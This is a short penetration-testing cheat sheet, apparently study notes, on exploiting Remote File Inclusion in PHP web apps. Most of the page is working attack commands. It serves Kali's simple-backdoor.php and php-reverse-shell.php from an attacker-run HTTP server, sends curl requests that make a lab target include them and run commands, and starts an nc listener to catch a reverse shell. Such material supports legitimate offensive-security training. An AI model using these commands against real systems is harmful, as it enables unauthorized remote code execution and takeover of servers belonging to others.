Remote File Inclusion (RFI)

First check:

Is allow_url_include enabled ? (Check if possible or try it by running command directly 😂) for using RFI vulnerability.

RFI vulnerabilities allow us to include files from a remote system over HTTP or SMB. Common scenarios where we'll find this option enabled is when the web application loads files or contents from remote systems e.g. libraries or application data.

# Way to exploit this vulnerability.
# We can use simple-backdoor.php file present in kali linux in webshell
locate simple-backdoor.php

# start server in the location of file.
python3 -m http.server 8000 -d /usr/share/webshells/php/

# Use curl or burpsuite to access the content.
curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.45.213:8000/simple-backdoor.php&cmd=ls"

# We can also gain access to the shell by executing a shell command after the prefix 'cmd='.

# We can run php-reverse-shell.php (≧▽≦)
# if you don't know about underlying system then use this php revershell code
# https://github.com/ivan-sincek/php-reverse-shell
# Automatically detects the system and gets the shell.
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
# change ip and port number.
cat shell.php| grep -i "change this"
# Start server and run command as did before.
python3 -m http.server 8000
sudo rlwrap nc -lnvp 4444
curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.45.213:8000/shell.php"

# You will get a shell.

PreviousPHP Wrappers NextFile Upload

Last updated 1 year ago